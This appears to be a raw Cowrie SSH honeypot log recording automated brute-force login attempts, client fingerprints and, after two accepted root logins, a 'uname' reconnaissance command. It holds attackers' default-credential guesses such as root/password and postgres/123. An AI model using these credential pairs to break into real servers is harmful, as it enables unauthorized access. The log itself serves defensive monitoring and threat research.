{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-28T03:20:00.530295Z","src_ip":"45.125.211.194","session":"6dbb2a8f6fd0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:01.744884Z","src_ip":"45.125.211.194","session":"6dbb2a8f6fd0"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":55039,"dst_ip":"1.2.3.4","dst_port":22,"session":"56e8075297c8","protocol":"ssh","message":"New connection: 45.125.211.194:55039 (1.2.3.4:22) [session: 56e8075297c8]","sensor":"my-vps","timestamp":"2025-08-28T03:20:14.423228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:20:14.435343Z","src_ip":"45.125.211.194","session":"56e8075297c8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:20:14.683578Z","src_ip":"45.125.211.194","session":"56e8075297c8"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:20:15.525048Z","src_ip":"45.125.211.194","session":"56e8075297c8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:16.748816Z","src_ip":"45.125.211.194","session":"56e8075297c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46104,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab36f594ebd7","protocol":"ssh","message":"New connection: 212.227.235.229:46104 (1.2.3.4:22) [session: ab36f594ebd7]","sensor":"my-vps","timestamp":"2025-08-28T03:20:19.404463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:20:19.405375Z","src_ip":"212.227.235.229","session":"ab36f594ebd7"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:20:19.511136Z","src_ip":"212.227.235.229","session":"ab36f594ebd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56118,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bc9cffd6e11","protocol":"ssh","message":"New connection: 212.227.125.160:56118 (1.2.3.4:22) [session: 4bc9cffd6e11]","sensor":"my-vps","timestamp":"2025-08-28T03:20:20.984224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:20:20.985025Z","src_ip":"212.227.125.160","session":"4bc9cffd6e11"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:20:21.197057Z","src_ip":"212.227.125.160","session":"4bc9cffd6e11"}
{"eventid":"cowrie.login.failed","username":"zq","password":"123456","message":"login attempt [zq/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:20:21.414996Z","src_ip":"212.227.235.229","session":"ab36f594ebd7"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:20:21.836613Z","src_ip":"212.227.125.160","session":"4bc9cffd6e11"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:20:22.376038Z","src_ip":"212.227.125.160","session":"4bc9cffd6e11"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:20:22.376756Z","src_ip":"212.227.125.160","session":"4bc9cffd6e11"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:22.525150Z","src_ip":"212.227.235.229","session":"ab36f594ebd7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:22.590453Z","src_ip":"212.227.125.160","session":"4bc9cffd6e11"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:22.591515Z","src_ip":"212.227.125.160","session":"4bc9cffd6e11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40856,"dst_ip":"1.2.3.4","dst_port":22,"session":"607995856476","protocol":"ssh","message":"New connection: 212.227.235.229:40856 (1.2.3.4:22) [session: 607995856476]","sensor":"my-vps","timestamp":"2025-08-28T03:20:26.342074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:20:26.342945Z","src_ip":"212.227.235.229","session":"607995856476"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T03:20:26.450727Z","src_ip":"212.227.235.229","session":"607995856476"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos123456","message":"login attempt [centos/centos123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:20:26.775707Z","src_ip":"212.227.235.229","session":"607995856476"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:27.885684Z","src_ip":"212.227.235.229","session":"607995856476"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":58221,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8dc9130b811","protocol":"ssh","message":"New connection: 45.125.211.194:58221 (1.2.3.4:22) [session: a8dc9130b811]","sensor":"my-vps","timestamp":"2025-08-28T03:20:29.285612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:20:29.313641Z","src_ip":"45.125.211.194","session":"a8dc9130b811"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:20:29.496410Z","src_ip":"45.125.211.194","session":"a8dc9130b811"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49210,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc2112376828","protocol":"ssh","message":"New connection: 212.227.235.229:49210 (1.2.3.4:22) [session: bc2112376828]","sensor":"my-vps","timestamp":"2025-08-28T03:20:29.665766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:20:29.666590Z","src_ip":"212.227.235.229","session":"bc2112376828"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:20:29.911942Z","src_ip":"212.227.235.229","session":"bc2112376828"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-28T03:20:30.334244Z","src_ip":"45.125.211.194","session":"a8dc9130b811"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:20:30.895320Z","src_ip":"212.227.235.229","session":"bc2112376828"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:31.545471Z","src_ip":"45.125.211.194","session":"a8dc9130b811"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:32.142956Z","src_ip":"212.227.235.229","session":"bc2112376828"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41856,"dst_ip":"1.2.3.4","dst_port":22,"session":"b66900fc13f4","protocol":"ssh","message":"New connection: 212.227.235.229:41856 (1.2.3.4:22) [session: b66900fc13f4]","sensor":"my-vps","timestamp":"2025-08-28T03:20:41.709921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:20:41.710813Z","src_ip":"212.227.235.229","session":"b66900fc13f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:20:41.965535Z","src_ip":"212.227.235.229","session":"b66900fc13f4"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:20:42.732820Z","src_ip":"212.227.235.229","session":"b66900fc13f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:20:43.261162Z","src_ip":"212.227.235.229","session":"b66900fc13f4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:20:43.261881Z","src_ip":"212.227.235.229","session":"b66900fc13f4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:43.518573Z","src_ip":"212.227.235.229","session":"b66900fc13f4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:43.519763Z","src_ip":"212.227.235.229","session":"b66900fc13f4"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":59066,"dst_ip":"1.2.3.4","dst_port":22,"session":"b17df87119e6","protocol":"ssh","message":"New connection: 45.125.211.194:59066 (1.2.3.4:22) [session: b17df87119e6]","sensor":"my-vps","timestamp":"2025-08-28T03:20:44.194452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:20:44.220725Z","src_ip":"45.125.211.194","session":"b17df87119e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:20:44.404868Z","src_ip":"45.125.211.194","session":"b17df87119e6"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-28T03:20:45.243212Z","src_ip":"45.125.211.194","session":"b17df87119e6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:46.454935Z","src_ip":"45.125.211.194","session":"b17df87119e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34504,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b725a814bde","protocol":"ssh","message":"New connection: 212.227.235.229:34504 (1.2.3.4:22) [session: 9b725a814bde]","sensor":"my-vps","timestamp":"2025-08-28T03:20:53.119443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:20:53.120090Z","src_ip":"212.227.235.229","session":"9b725a814bde"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:20:53.371114Z","src_ip":"212.227.235.229","session":"9b725a814bde"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:20:54.128018Z","src_ip":"212.227.235.229","session":"9b725a814bde"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:55.382871Z","src_ip":"212.227.235.229","session":"9b725a814bde"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60692,"dst_ip":"1.2.3.4","dst_port":22,"session":"711a5f94a91c","protocol":"ssh","message":"New connection: 217.72.205.35:60692 (1.2.3.4:22) [session: 711a5f94a91c]","sensor":"my-vps","timestamp":"2025-08-28T03:20:56.338775Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:20:56.339985Z","src_ip":"217.72.205.35","session":"711a5f94a91c"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":32864,"dst_ip":"1.2.3.4","dst_port":22,"session":"a32522674c5d","protocol":"ssh","message":"New connection: 45.125.211.194:32864 (1.2.3.4:22) [session: a32522674c5d]","sensor":"my-vps","timestamp":"2025-08-28T03:20:58.990586Z"}
